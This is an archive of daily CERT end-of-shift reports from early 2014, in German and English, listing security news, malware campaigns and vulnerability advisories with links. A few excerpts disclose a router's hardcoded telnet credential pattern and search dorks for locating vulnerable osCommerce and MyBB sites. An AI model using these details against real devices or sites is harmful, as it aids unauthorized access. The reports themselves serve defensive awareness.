http://www.heise.de/security/meldung/Das-Ende-des-Magnetstreifens-USA-wechs… *** Survey: Just 1 in 3 Euro biz slackers meets card security standards *** --------------------------------------------- Yet PCI-DSS has largely been a failure, wails securo-bod European businesses are lagging far behind the rest of the world in compliance with global payment card industry security standards, according to a new survey. --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2014/02/11/pci_survey_… *** NTP-Reflection: Cloudflare meldet massiven DDoS-Angriff *** --------------------------------------------- Der Netzwerksicherheitsanbieter Cloudflare hat in der Nacht einen massiven DDoS-Angriff auf einen seiner Kunden gemeldet. Es handele sich um einen NTP-Reflection-Angriff, der größer sein soll als der Angriff auf Spamhaus Mitte 2013. (Server, DE-CIX) --------------------------------------------- http://www.golem.de/news/ntp-reflection-cloudfare-meldet-massiven-ddos-angr… *** Anti-Diebstahl-Software für Notebooks als Einfallstor *** --------------------------------------------- Sicherheitsexperten haben die auf Notebooks oft vorinstallierte Anwendung Computrace unter die Lupe genommen. Ergebnis: Die Software hat eine massive Sicherheitslücke. Außerdem lässt sie sich nicht immer deaktivieren. --------------------------------------------- http://www.heise.de/security/meldung/Anti-Diebstahl-Software-fuer-Notebooks… *** The Mask/Careto: Hochentwickelter Cyberangriff auf Energieunternehmen *** --------------------------------------------- Bis Januar 2014 war die Cyberwaffe The Mask aktiv, die Sicherheitslücken in Kaspersky-Software und im Adobe Flash Player ausnutzte. Die Malware arbeitet mit Rootkit, Bootkit und Versionen für Mac OS X, Linux, Android und iOS und löscht ihre Logdateien durch überschreiben. --------------------------------------------- http://www.golem.de/news/the-mask-careto-hochentwickelter-cyberangriff-auf-… *** Blog: The Careto/Mask APT: Frequently Asked Questions *** --------------------------------------------- The Mask is an advanced threat actor that has been involved in cyber-espionage operations since at least 2007. --------------------------------------------- http://www.securelist.com/en/blog/208216078/The_Careto_Mask_APT_Frequently_… *** Five OAuth Bugs Lead to Github Hack *** --------------------------------------------- A Russian researcher was able to take five low severity OAuth bugs and string them together to create what he calls a "simple but high severity exploit" in Github. --------------------------------------------- http://threatpost.com/five-oauth-bugs-lead-to-github-hack/104178 *** Your PenTest Tools Arsenal *** --------------------------------------------- When it comes about information security one of the major problems is to set your PenTest Tools Arsenal. The truth is there are too many tools out there and it would take forever to try half of them to see if it fit your needs. Over the years, there are some well established tools that most of security professionals use them but that doesn't mean that out there are not unknown still very good pentest tools. --------------------------------------------- https://community.rapid7.com/community/metasploit/blog/2014/02/11/your-pent… *** Symantec Web Gateway Security Management Console Multiple Security Issues *** --------------------------------------------- Symantec Web Gateway (SWG) Appliance management console is susceptible to both local and remote access cross-site scripting (XSS) and local access SQL injection (sqli) vulnerabilities. Successful exploitation may result in an authorized user gaining unauthorized access to files on the management console or possibility being able to manipulate the backend data base. There is also potential for remote hijacking of an authorized user session with associated privileges. --------------------------------------------- http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=se… *** Schneider ClearSCADA File Parsing Vulnerability *** --------------------------------------------- https://secunia.com/advisories/56880 *** [webapps] - WiFi Camera Roll 1.2 iOS - Multiple Vulnerabilities *** --------------------------------------------- http://www.exploit-db.com/exploits/31573 *** IBM WebSphere Portal Arbitrary File Upload Security Bypass Vulnerability *** --------------------------------------------- https://secunia.com/advisories/56805 *** Bugtraq: Open-Xchange Security Advisory 2014-02-10 *** --------------------------------------------- http://www.securityfocus.com/archive/1/531005 *** parcimonie (0.6 to 0.8, included) possible correlation between key fetches *** --------------------------------------------- Topic: parcimonie (0.6 to 0.8, included) possible correlation between key fetches Risk: Low Text:Hi, Holger Levsen discovered that parcimonie [1], a privacy-friendly helper to refresh a GnuPG k... --------------------------------------------- http://cxsecurity.com/issue/WLB-2014020072 *** Joomla JomSocial Remote Code Execution Vulnerability *** --------------------------------------------- The JomSocial team just released an update that fixes a very serious remote code execution vulnerability that affects any JomSocial version older than 3.1.0.4. From their hot-fix update: Yesterday we released version 3.1.0.4 which fixes two vulnerabilities. As a result of the first vulnerability, our own site was hacked. Thankfully, our security experts spotted the... --------------------------------------------- http://blog.sucuri.net/2014/02/joomla-jomsocial-remote-code-execution-vulne… *** Perl Regex Processing Flaw Lets Remote and Local Users Deny Service *** --------------------------------------------- http://www.securitytracker.com/id/1029735 *** Titan FTP Server 10.32 Build 1816 Directory Traversals *** --------------------------------------------- http://cxsecurity.com/issue/WLB-2014020075 *** Avaya Call Management System (CMS) Security Issue and Two Vulnerabilities *** --------------------------------------------- https://secunia.com/advisories/56926 *** Google Android addJavascriptInterface code execution *** --------------------------------------------- http://xforce.iss.net/xforce/xfdb/90998

1 0

Tageszusammenfassung - Montag 10-02-2014
by Daily end-of-shift report 10 Feb '14

10 Feb '14

======================= = End-of-Shift report = ======================= Timeframe: Freitag 07-02-2014 18:00 − Montag 10-02-2014 18:00 Handler: Stephan Richter Co-Handler: n/a *** Darkleech + Bitly.com = Insightful Statistics *** --------------------------------------------- This post is about how hackers abuse popular web services, and how this helps security researchers obtain interesting statistics about malware attacks. We, at Sucuri, work with infected websites every day. While we see some particular infections on one site or on multiple sites, we can't accurately tell how many more sites out there are... --------------------------------------------- http://blog.sucuri.net/2014/02/darkleech-bitly-com-insightful-statistics.ht… *** The Internet is Broken - Act Accordingly *** --------------------------------------------- Costin Raiu is a cautious man. He measures his words carefully and says exactly what he means, and is not given to hyperbole or exaggeration. Raiu is the driving force behind much of the intricate research into APTs and targeted attacks that Kaspersky Lab's Global Research and Analysis Team has been doing for the last... --------------------------------------------- http://threatpost.com/the-internet-is-broken-act-accordingly/104141 *** Linkup ransomware blocks internet access, mines Bitcoins *** --------------------------------------------- A trojan variant, Linkup, identified by Emsisoft, takes control of DNS servers, blocks internet access and mines Bitcoins. --------------------------------------------- http://www.scmagazine.com/linkup-ransomware-blocks-internet-access-mines-bi… *** February 2014 Threat Stats *** --------------------------------------------- Its no surprise that this months threat stats reveal that the largest breach to take place in December involved Target, where 40 million individuals were affected by the point-of-sale malware that swiped the data. --------------------------------------------- http://www.scmagazine.com/february-2014-threat-stats/slideshow/1809/#0 *** iOS: Sicherheitsforscher warnt vor DoS-Möglichkeit über Snapchat *** --------------------------------------------- Durch Wiederverwendung alter App-Tokens soll es möglich sein, große Mengen an Nachrichten an Nutzer des Bilderdienstes zu schicken, was dann auch dem iPhone Probleme bereiten soll. Snapchat ist das Problem neu. --------------------------------------------- http://www.heise.de/security/meldung/iOS-Sicherheitsforscher-warnt-vor-DoS-… *** Want to remotely control a car? $20 in parts, some oily fingers, and youre in command *** --------------------------------------------- Spanish hackers have been showing off their latest car-hacking creation; a circuit board using untraceable, off-the-shelf parts worth $20 that can give wireless access to the cars controls while its on the road. --------------------------------------------- http://www.theregister.co.uk/2014/02/06/want_to_hack_a_car_20_in_parts_some… *** Mac Trojan Steals Bitcoin Wallet Credentials *** --------------------------------------------- A new Trojan for Mac OS X disguised as an app for sending and receiving payments steals Bitcoin wallet login credentials. --------------------------------------------- http://threatpost.com/mac-trojan-steals-bitcoin-wallet-credentials/104152 *** Security Bulletin: Fix available for Cross Site Scripting vulnerabilities in IBM Connections Portlets for WebSphere Portal (CVE-2014-0855) *** --------------------------------------------- A fix is available for Cross Site Scripting (XSS) vulnerabilities in IBM Connections Portlets for WebSphere Portal. --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=swg21663921 *** Bugtraq: [oCERT-2014-001] MantisBT input sanitization errors *** --------------------------------------------- http://www.securityfocus.com/archive/1/530980 *** Bugtraq: ASUS AiCloud Enabled Routers 12 Models - Authentication bypass and Sensitive file/path disclosure *** --------------------------------------------- http://www.securityfocus.com/archive/1/530985 *** Contao "Input::postRaw()" PHP Object Injection Vulnerability *** --------------------------------------------- https://secunia.com/advisories/56755 *** Xerox ColorQube 8700 / 8900 Unspecified Vulnerabilities *** --------------------------------------------- https://secunia.com/advisories/56889

1 0

Tageszusammenfassung - Freitag 7-02-2014
by Daily end-of-shift report 07 Feb '14

07 Feb '14

======================= = End-of-Shift report = ======================= Timeframe: Donnerstag 06-02-2014 18:00 − Freitag 07-02-2014 18:00 Handler: Stephan Richter Co-Handler: n/a *** Advance Notification Service for February 2014 Security Bulletin Release *** --------------------------------------------- Today we are providing advance notification for the release of five bulletins, two rated Critical and three rated Important, for February 2014. The Critical updates address vulnerabilities in Microsoft Windows and Security Software while the Important-rated updates address issues in Windows and the .NET Framework. --------------------------------------------- http://blogs.technet.com/b/msrc/archive/2014/02/06/advance-notification-ser… *** Syrian Electronic Army nimmt beinahe Facebook vom Netz *** --------------------------------------------- Die Hacker der Syrian Electronic Army haben es fast geschafft, Facebooks Domain zu kapern. Zugang verschafften sie sich wohl durch das Administrationsinterface der Registrars MarkMonitor. --------------------------------------------- http://www.heise.de/security/meldung/Syrian-Electronic-Army-nimmt-beinahe-F… *** Bug in iOS 7: Fernortung lässt sich abdrehen *** --------------------------------------------- Mit einem Trick ist es möglich, bei iOS-7-Geräten Apples "Mein iPhone/iPad suchen", mit dem auch ein geklautes Gerät wiedergefunden werden kann, ohne Passwort zu deaktivieren. Dazu muss das Gerät allerdings entsperrt sein. --------------------------------------------- http://www.heise.de/security/meldung/Bug-in-iOS-7-Fernortung-laesst-sich-ab… *** A Look at Malware with Virtual Machine Detection *** --------------------------------------------- It's not uncommon for the malware of today to include some type of built-in virtual machine detection. Virtual Machines (VMs) are an essential part of a malware analyst's work environment. After all, we wouldn't want to infect our physical - or "bare-metal" computers - to all the... --------------------------------------------- http://blog.malwarebytes.org/intelligence/2014/02/a-look-at-malware-with-vi… *** Large-scale DNS redirection on home routers for financial theft *** --------------------------------------------- In late 2013 CERT Polska received confirmed reports about modifications in e-banking websites observed on... iPhones. Users were presented with messages about alleged changes in account numbers that required confirmation with mTANs. This behavior would suggest that some Zeus-like trojan had been ported to iOS. As this would be the first confirmed case of such malware... --------------------------------------------- https://www.cert.pl/news/8019/langswitch_lang/en *** Fritzbox-Angriff analysiert: AVM bereitet Firmware-Updates vor *** --------------------------------------------- AVM hat den für Telefoniemissbrauch benutzten Angriffsweg nachvollzogen und bereitet Firmware-Updates für Fritzboxen vor, die am Wochenende erscheinen sollen. --------------------------------------------- http://www.heise.de/security/meldung/Fritzbox-Angriff-analysiert-AVM-bereit… *** Joomla! PROJOOM Smart Flash Header Component Arbitrary File Upload Vulnerability *** --------------------------------------------- https://secunia.com/advisories/56831 *** Bugtraq: CVE-2014-1214 - Remote Code Execution in Projoom NovaSFH Plugin *** --------------------------------------------- http://www.securityfocus.com/archive/1/530938 *** Core FTP Server Vulnerabilities *** --------------------------------------------- CVE-2014-1441: Race condition leading to Denial of Service on the "AUTH SSL" command with invalid SSL data CVE-2014-1442: "XCRC" Directory Traversal Information Disclosure CVE-2014-1443: Password Disclosure Vulnerability --------------------------------------------- http://permalink.gmane.org/gmane.comp.security.full-disclosure/91518 *** Bugtraq: [SECURITY] CVE-2014-0050 Apache Commons FileUpload and Apache Tomcat DoS *** --------------------------------------------- http://www.securityfocus.com/archive/1/530936 *** IBM Tealeaf CX Passive Capture Application remote code execution *** --------------------------------------------- http://xforce.iss.net/xforce/xfdb/89228 *** IBM Tealeaf CX Passive Capture Application local file include *** --------------------------------------------- http://xforce.iss.net/xforce/xfdb/89229 *** Symantec Encryption Management Server Web Email Protection information disclosure *** --------------------------------------------- http://xforce.iss.net/xforce/xfdb/90946 *** Palo Alto Networks PAN-OS Certificate Invalidation on Master Key Change Security Bypass Security Issue *** --------------------------------------------- https://secunia.com/advisories/56392 *** Schneider Electric SCADAPack VxWorks Debugger Vulnerability *** --------------------------------------------- https://secunia.com/advisories/56811 *** osCommerce 2.3.3.4 SQL Injection *** --------------------------------------------- Topic: osCommerce 2.3.3.4 SQL Injection Risk: Medium Text:# Title: osCommerce v2.x SQL Injection Vulnerability # Dork: Powered by osCommerce # Author: Ahmed Aboul-Ela # Contact: ahme... --------------------------------------------- http://cxsecurity.com/issue/WLB-2014020042

1 0

Tageszusammenfassung - Donnerstag 6-02-2014
by Daily end-of-shift report 06 Feb '14

06 Feb '14

======================= = End-of-Shift report = ======================= Timeframe: Mittwoch 05-02-2014 18:00 − Donnerstag 06-02-2014 18:00 Handler: Stephan Richter Co-Handler: n/a *** Target Hackers Broke in Via HVAC Company *** --------------------------------------------- Last week, Target told reporters at The Wall Street Journal and Reuters that the initial intrusion into its systems was traced back to network credentials that were stolen from a third party vendor. Sources now tell KrebsOnSecurity that the vendor in question was a refrigeration, heating and air conditioning subcontractor that has worked at a number of locations at Target and other top retailers. --------------------------------------------- http://feedproxy.google.com/~r/KrebsOnSecurity/~3/JuvkO7plF2E/ *** Angriffe auf Fritzboxen: AVM empfiehlt Abschaltung der Fernkonfiguration *** --------------------------------------------- Nach ersten Fällen von Telefonie-Missbrauch halten Angriffe auf Fritzboxen über die Fernkonfiguration an. Um Schäden vorzubeugen, sollen Fritzbox-Nutzer die Funktion vorübergehend deaktivieren. --------------------------------------------- http://www.heise.de/security/meldung/Angriffe-auf-Fritzboxen-AVM-empfiehlt-… *** Demystifying Point of Sale Malware and Attacks *** --------------------------------------------- Cybercriminals have an insatiable thirst for credit card data. There are multiple ways to steal this information on-line, but Point of Sales are the most tempting target. An estimated 60 percent of purchases at retailers' Point of Sale (POS) are paid for using a credit or debit card. Given that large retailers may process thousands of transactions daily though their POS, it stands to reason that POS terminals have come into the crosshairs of cybercriminals seeking large volumes of credit... --------------------------------------------- http://www.symantec.com/connect/blogs/demystifying-point-sale-malware-and-a… *** Malware Uses ZWS Compression for Evasion Tactic *** --------------------------------------------- Cybercriminals can certainly be resourceful when it comes to avoiding detection. We have seen many instances wherein malware came equipped with improved evasion techniques, such as preventing execution of analysis tools, hiding from debuggers, blending in with normal network traffic, along with various JavaScript techniques. Security researchers have now come across malware that uses a legitimate compression technique to go unnoticed by security solutions. --------------------------------------------- http://blog.trendmicro.com/trendlabs-security-intelligence/malware-uses-zws… *** New Asprox Variant Goes Above and Beyond to Hijack Victims *** --------------------------------------------- [UPDATE] After further analysis, this threat was identified as Asprox botnet and not Zbot --------------------------------------------- http://research.zscaler.com/2014/02/new-zbot-variant-goes-above-and-beyond.… *** OpenLDAP 2.4.36 Remote Users Deny Of Service *** --------------------------------------------- Topic: OpenLDAP 2.4.36 Remote Users Deny Of Service Risk: Medium Text:It was discovered that OpenLDAP, with the rwm overlay to slapd, could segfault if a user were able to query the directory and i... --------------------------------------------- http://cxsecurity.com/issue/WLB-2014020032 *** Rockwell RSLogix 5000 Password Vulnerability *** --------------------------------------------- OVERVIEW: This advisory was originally posted to the US-CERT secure Portal library on January 21, 2014, and is now being released to the NCCIC/ICS-CERT Web site.Independent researcher Stephen Dunlap has identified a password vulnerability in the Rockwell Automation RSLogix 5000 software. Rockwell Automation has produced a new version that mitigates this vulnerability. --------------------------------------------- http://ics-cert.us-cert.gov/advisories/ICSA-14-021-01 *** NETGEAR Router D6300B Telnet Backdoor Lets Remote Users Gain Root Access *** --------------------------------------------- http://www.securitytracker.com/id/1029727 *** DSA-2855 libav *** --------------------------------------------- several vulnerabilities --------------------------------------------- http://www.debian.org/security/2014/dsa-2855 *** Security Bulletin: IBM Domino IMAP Server Denial of Service Vulnerability (CVE-2014-0822) *** --------------------------------------------- The IMAP server in IBM Domino contains a denial of service vulnerability. A remote unauthenticated attacker could exploit this security vulnerability to cause a crash of the Domino server. The fix for this issue is available as a hotfix and is planned to be incorporated in all upcoming Interim Fixes, Fix Packs and Maintenance Releases. --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=swg21663023 *** Bugtraq: ESA-2014-005: EMC Documentum Foundation Services (DFS) Content Access Vulnerability *** --------------------------------------------- http://www.securityfocus.com/archive/1/530929 *** Vulnerabilities in Drupal Third-Party Modules *** --------------------------------------------- https://drupal.org/node/2187453 https://drupal.org/node/2189509 https://drupal.org/node/2189643 https://drupal.org/node/2189751 *** WordPress WooCommerce SagePay Direct Payment Gateway Cross-Site Scripting Vulnerability *** --------------------------------------------- https://secunia.com/advisories/56801

1 0

Tageszusammenfassung - Mittwoch 5-02-2014
by Daily end-of-shift report 05 Feb '14

05 Feb '14

======================= = End-of-Shift report = ======================= Timeframe: Dienstag 04-02-2014 18:00 − Mittwoch 05-02-2014 18:00 Handler: Stephan Richter Co-Handler: Robert Waldner *** WordPress Stop User Enumeration Plugin "author" User Enumeration Weakness *** --------------------------------------------- Andrew Horton has discovered a weakness in the Stop User Enumeration plugin for WordPress, which can be exploited by malicious people to disclose certain sensitive information. The weakness is caused due to an error when handling the "author" POST parameter, which can be exploited to enumerate valid usernames. The weakness is confirmed in version 1.2.4. Other versions may also be affected. --------------------------------------------- https://secunia.com/advisories/56643 *** Chrome Web Store Beset by Spammy Extensions *** --------------------------------------------- Twelve seemingly legitimate Chrome browser extensions installed by more than 180,000 users are injecting advertisements on 44 popular websites. --------------------------------------------- http://threatpost.com/chrome-web-store-beset-by-spammy-extensions/104031 *** Joomla! JomSocial Component Arbitrary Code Execution Vulnerability *** --------------------------------------------- A vulnerability has been reported in the JomSocial component for Joomla!, which can be exploited by malicious people to compromise a vulnerable system. --------------------------------------------- https://secunia.com/advisories/56692 *** New Zbot Variant Goes Above and Beyond to Hijack Victims *** --------------------------------------------- Zbot is an extremely venomous threat, which has strong persistent tactics to ensure that the victim remains infected despite removal attempts. We will get to the overabundance of methods used to keep the victim infected later on. --------------------------------------------- http://feedproxy.google.com/~r/zscaler/research/~3/ZKiYWwxWXJA/new-zbot-var… *** Microsoft Security Advisory (2755801): Update for Vulnerabilities in Adobe Flash Player in Internet Explorer - Version: 19.0 *** --------------------------------------------- The update addresses the vulnerabilities in Adobe Flash Player by updating the affected Adobe Flash libraries contained within Internet Explorer 10 and Internet Explorer 11. --------------------------------------------- http://technet.microsoft.com/en-us/security/advisory/2755801 *** Cybercriminals release Socks4/Socks5 based Alexa PageRank boosting application *** --------------------------------------------- A newly released, commercially available, DIY tool is pitching itself as being capable of boosting a given domain/list of domains on Alexa’s PageRank, relying on the syndication of Socks4/Socks5 malware-infected/compromised hosts through a popular Russian service. --------------------------------------------- http://feedproxy.google.com/~r/WebrootThreatBlog/~3/VIunL9T8af4/ *** Peinliches Loch in BlackBerrys Geschäftsdaten-Tresor *** --------------------------------------------- Beim BlackBerry 10 versagt eine Policy, die geschäftliche Kontakte vor Zugriffen durch persönliche Apps schützen soll. Die Schwachstelle macht persönlichen Android-Apps Namen und Telefonnummern zugänglich. --------------------------------------------- http://www.heise.de/security/meldung/Peinliches-Loch-in-BlackBerrys-Geschae… *** Standard Operational Procedures to manage multinational cyber-crises finalised by EU, EFTA Member States and ENISA *** --------------------------------------------- Today, with the development of the EU-Standard Operational Procedures (EU-SOPs), a milestone has been reached for the management of multinational cyber crises. These procedures were developed by the EU and European Free Trade Association (EFTA) Member States in collaboration with the EU Agency ENISA. --------------------------------------------- http://www.enisa.europa.eu/media/press-releases/standard-operational-proced… *** #Asusgate: Zehntausende Router geben private Dateien preis *** --------------------------------------------- Im Netz sind IP-Adressen für zehntausende verwundbare Asus-Router aufgetaucht. Unter dem Titel "#ASUSGATE" veröffentlichten Unbekannte zudem Listen mit privaten Dateien auf angeschlossenen USB-Geräten. --------------------------------------------- http://www.heise.de/security/meldung/Asusgate-Zehntausende-Router-geben-pri… *** How to fail at Incident Response *** --------------------------------------------- Im a firm believer in having a sound incident response plan (and policies to go with it). One big piece of this is having a plan with regards to how the IR team should communicate. How should you communicate? Well, thats going to depend on your situation. But let me first answer the easier question: how you should not communicate. --------------------------------------------- http://malwarejake.blogspot.se/2014/02/how-to-fail-at-incident-response.html *** Blog: CVE-2014-0497 – a 0-day vulnerability *** --------------------------------------------- A short while ago, we came across a set of similar SWF exploits and were unable to determine which vulnerability they exploited. --------------------------------------------- http://www.securelist.com/en/blog/8177/CVE_2014_0497_a_0_day_vulnerability

1 0

Tageszusammenfassung - Dienstag 4-02-2014
by Daily end-of-shift report 04 Feb '14

04 Feb '14

======================= = End-of-Shift report = ======================= Timeframe: Montag 03-02-2014 18:00 − Dienstag 04-02-2014 18:00 Handler: Stephan Richter Co-Handler: n/a *** New iFrame Injections Leverage PNG Image Metadata *** --------------------------------------------- We're always trying to stay ahead of the latest trends, and today we caught a very interesting one that we have either been missing, or it's new. We'll just say it's new.. We're all familiar with the idea of iFrame Injections, right? Understanding an iFrame Injection The iFrame HTML tag is very standard today, it's... --------------------------------------------- http://blog.sucuri.net/2014/02/new-iframe-injections-leverage-png-image-met… *** These Guys Battled BlackPOS at a Retailer *** --------------------------------------------- Ever since news broke that thieves stole more than 40 million debit and credit card accounts from Target using a strain of Point-Of-Sale malware known as BlackPOS, much speculation has swirled around unanswered questions, such as how this malware was introduced into the network, and what mechanisms were used to infect thousands of Targets cash registers. --------------------------------------------- http://krebsonsecurity.com/2014/02/these-guys-battled-blackpos-at-a-retaile… *** Search Engines for OSINT and Recon *** --------------------------------------------- Based on the title to this post, you're thinking, "Awesome, Dave! Welcome to 2006!" Well hang on there. There's an amazing number of awesome search facilities that can be useful when doing OSINT and recon work for pen testing. I'll list a lot of different sites that I have discovered and use regularly for both. --------------------------------------------- http://daveshackleford.com/?p=999 *** Defending Against Tor-Using Malware, Part 2 *** --------------------------------------------- Last week, we talked about what Tor is, how it works, and why system administrators need to be aware of it. Now the question is: should I block Tor, and if I do decide to do that, what can be done to block Tor? Tor, by itself, is not inherently malicious. If a user wants... --------------------------------------------- http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/njzW9v7v14w/ *** VU#228886: ZTE ZXV10 W300 router contains hardcoded credentials *** --------------------------------------------- Vulnerability Note VU#228886 ZTE ZXV10 W300 router contains hardcoded credentials Original Release date: 03 Feb 2014 | Last revised: 03 Feb 2014 Overview ZTE ZXV10 W300 router version 2.1.0, and possibly earlier versions, contains hardcoded credentials. (CWE-798) Description ZTE ZXV10 W300 router contains hardcoded credentials that are useable for the telnet service on the device. The username is "admin" and the password is "XXXXairocon" where "XXXX" is the last... --------------------------------------------- http://www.kb.cert.org/vuls/id/228886 *** VU#593118: Fortinet Fortiweb 5.0.3 contains a reflected cross-site scripting vulnerability *** --------------------------------------------- Vulnerability Note VU#593118 Fortinet Fortiweb 5.0.3 contains a reflected cross-site scripting vulnerability Original Release date: 03 Feb 2014 | Last revised: 03 Feb 2014 Overview Fortinet Fortiweb 5.0.3, and possibly earlier versions, contains a cross-site scripting vulnerability. (CWE-79) Description CWE-79: Improper Neutralization of Input During Web Page Generation (Cross-site Scripting)Fortinet Fortiweb 5.0.3, and possibly earlier versions, contains a cross-site scripting... --------------------------------------------- http://www.kb.cert.org/vuls/id/593118 *** VU#728638: Fortinet FortiOS 5.0.5 contains a reflected cross-site scripting (XSS) vulnerability *** --------------------------------------------- Vulnerability Note VU#728638 Fortinet FortiOS 5.0.5 contains a reflected cross-site scripting (XSS) vulnerability Original Release date: 03 Feb 2014 | Last revised: 03 Feb 2014 Overview Fortinet FortiOS 5.0.5, and possibly earlier versions, contains a cross-site scripting vulnerability. (CWE-79) Description CWE-79: Improper Neutralization of Input During Web Page Generation (Cross-site Scripting)Fortinet FortiOS 5.0.5, and possibly earlier versions, contains a cross-site scripting... --------------------------------------------- http://www.kb.cert.org/vuls/id/728638 *** VU#813382: Dell KACE K1000 management appliance contains a cross-site scripting vulnerability *** --------------------------------------------- Vulnerability Note VU#813382 Dell KACE K1000 management appliance contains a cross-site scripting vulnerability Original Release date: 04 Feb 2014 | Last revised: 04 Feb 2014 Overview Dell KACE K1000 management appliance version 5.5.90545, and possibly earlier versions, contains a cross-site scripting (XSS) vulnerability. (CWE-79) Description Dell KACE K1000 management appliance version 5.5.90545, and possibly earlier versions, contains a cross-site scripting (XSS) vulnerability. The --------------------------------------------- http://www.kb.cert.org/vuls/id/813382 *** Security Bulletins: Vulnerability in Citrix XenMobile Device Manager server, formerly known as Zenprise Device Manager server, could result in unauthenticated information disclosure *** --------------------------------------------- A vulnerability in Citrix XenMobile Device Manager server, formerly known as Zenprise Device Manager server, that could allow a remote, unauthenticated attacker to gain access to stored data. --------------------------------------------- http://support.citrix.com/article/CTX140044 *** MyBB 1.6.12 POST Cross Site Scripting *** --------------------------------------------- Topic: MyBB 1.6.12 POST Cross Site Scripting Risk: Low Text: <!-- Exploit-Title: MyBB 1.6.12 POST XSS 0day Google-Dork: inurl:index.php intext:Powered By MyBB Date: Februrary 2n... --------------------------------------------- http://cxsecurity.com/issue/WLB-2014020018 *** Chrony chronyc Protocol Response Amplification Denial of Service Vulnerability *** --------------------------------------------- https://secunia.com/advisories/56727 *** mpg123 MP3 Decoding Buffer Overflow Vulnerability *** --------------------------------------------- https://secunia.com/advisories/56729

1 0

Tageszusammenfassung - Montag 3-02-2014
by Daily end-of-shift report 03 Feb '14

03 Feb '14

======================= = End-of-Shift report = ======================= Timeframe: Freitag 31-01-2014 18:00 − Montag 03-02-2014 18:00 Handler: Stephan Richter Co-Handler: n/a *** Telefonie-Missbrauch anscheinend kein Massenhack von AVMs Fritzboxen *** --------------------------------------------- In den letzten Tagen wunderten sich einige Fritzbox-Nutzer über hohe, teils exorbitante Telefongebühren. Dahinter stecken anscheinend Angriffe mit bekannten Zugangsdaten auf die Fernkonfiguration der verwendeten Fritzboxen. --------------------------------------------- http://www.heise.de/security/meldung/Telefonie-Missbrauch-anscheinend-kein-… *** Hackers Use a Trick to Deliver Zeus Banking Malware *** --------------------------------------------- IDG News Service - Hackers found a new way to slip past security software and deliver Zeus, a long-known malicious software program that steals online banking details. Security company Malcovery Security, based in Georgia, alerted security analysts after finding that none of 50 security programs on Googles online virus scanning service VirusTotal were catching it as of early Sunday. --------------------------------------------- http://www.cio.com/article/747601/Hackers_Use_a_Trick_to_Deliver_Zeus_Banki… *** More than a million Android devices infected with bootkit trojan *** --------------------------------------------- More than a million Android mobile devices worldwide are now infected with a crafty bootkit trojan known as Android.Oldboot.1.origin - a number that has more than tripled in a week. --------------------------------------------- http://www.scmagazine.com//more-than-a-million-android-devices-infected-wit… *** DailyMotion Still Infected, Serving Fake AV Malware *** --------------------------------------------- DailyMotion, one of the most popular websites on the Web, is still serving fake AV malware three weeks after it was notified of a compromise. --------------------------------------------- http://threatpost.com/dailymotion-still-infected-serving-fake-av-malware/10… *** SSA-342587 (Last Update 2014-02-03): Vulnerabilities in SIMATIC WinCC Open Architecture *** --------------------------------------------- https://www.siemens.com/innovation/pool/de/forschungsfelder/siemens_securit… *** VU#250358: Various Inmarsat broadband satellite terminals contain multiple vulnerabilities *** --------------------------------------------- A number of broadband satellite terminals which utilize the Inmarsat satellite telecommunications network have been found to contain undocumented hardcoded login credentials (CWE-798). Additionally, these broadband satellite terminals utilize an insecure proprietary communications protocol that allows... --------------------------------------------- http://www.kb.cert.org/vuls/id/250358 *** DSA-2851 drupal6 *** --------------------------------------------- impersonation --------------------------------------------- http://www.debian.org/security/2014/dsa-2851 *** IBM Financial Transaction Manager multiple vulnerabilities *** --------------------------------------------- http://xforce.iss.net/xforce/xfdb/90584 http://xforce.iss.net/xforce/xfdb/90585 http://xforce.iss.net/xforce/xfdb/90586 http://xforce.iss.net/xforce/xfdb/90612 *** Security Bulletin: Cross-Site Request Forgery in IBM InfoSphere Master Data Management - Collaborative Edition (CVE-2013-5427) *** --------------------------------------------- Due to insufficient safeguards against cross-site request forgery, an attacker can trick a legitimate user into opening a URL that results in an action being taken as that user, potentially without the knowledge of that user. Any actions taken require that the legitimate user be already authenticated or to authenticate separately as part of the attack. --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=swg21663181

1 0

Tageszusammenfassung - Freitag 31-01-2014
by Daily end-of-shift report 31 Jan '14

31 Jan '14

======================= = End-of-Shift report = ======================= Timeframe: Donnerstag 30-01-2014 18:00 − Freitag 31-01-2014 18:00 Handler: Stephan Richter Co-Handler: n/a *** Researcher Warns of Critical Flaws in Oracle Servers *** --------------------------------------------- There are two vulnerabilities in some of Oracle's older database packages that allow an attacker to access a remote server without a password and even view the server's filesystem and dump arbitrary files. Oracle has not released a patch for one of the flaws, even though it was reported by a researcher more than two... --------------------------------------------- http://threatpost.com/researcher-warns-of-critical-flaws-in-oracle-servers/… *** Linux: Sicherheitslücke in x32-Code *** --------------------------------------------- Eine Sicherheitslücke im Linux-Kernel ermöglicht Nutzern das Schreiben in beliebige Speicherbereiche. Betroffen sind nur Kernel mit Unterstützung für x32-Code, in Ubuntu ist dies standardmäßig aktiviert. --------------------------------------------- http://www.golem.de/news/linux-sicherheitsluecke-in-x32-code-1401-104300-rs… *** Yahoo! Mail! users! change! your! passwords! NOW! *** --------------------------------------------- Web giant blames third-party database compromise Yahoo! is urging users of its Mail service to change their passwords to something secure and unique to the web giant - after a security breach exposed account login details to theft. --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2014/01/31/yahoo_mail_… *** Akamai Releases Third Quarter, 2013 State of the Internet Report *** --------------------------------------------- Akamai Technologies, Inc. (NASDAQ: AKAM), the leading provider of cloud services for delivering, optimizing and securing online content and business applications, today released its Third Quarter, 2013 State of the Internet Report. Based on data gathered from the Akamai Intelligent Platform, the report provides insight into key global statistics such as network connectivity and connection speeds, attack traffic, and broadband adoption and availability, among many others. --------------------------------------------- http://www.akamai.com/html/about/press/releases/2014/press_012814.html *** Chewbacca Point-of-Sale Malware Campaign Found in 10 Countries *** --------------------------------------------- A criminal campaign using the Tor-based Chewbacca Trojan, which includes memory-scraping malware and a keylogger, is responsible for the theft of more than 49,000 credit card numbers in 10 countries. --------------------------------------------- http://threatpost.com/chewbacca-point-of-sale-malware-campaign-found-in-10-… *** 3S CoDeSys Runtime Toolkit NULL Pointer Dereference *** --------------------------------------------- Independent researcher Nicholas Miles has identified a NULL pointer dereference vulnerability in Smart Software Solutions (3S) CoDeSys Runtime Toolkit application. 3S has produced an update that mitigates this vulnerability. Nicholas Miles has tested the update to validate 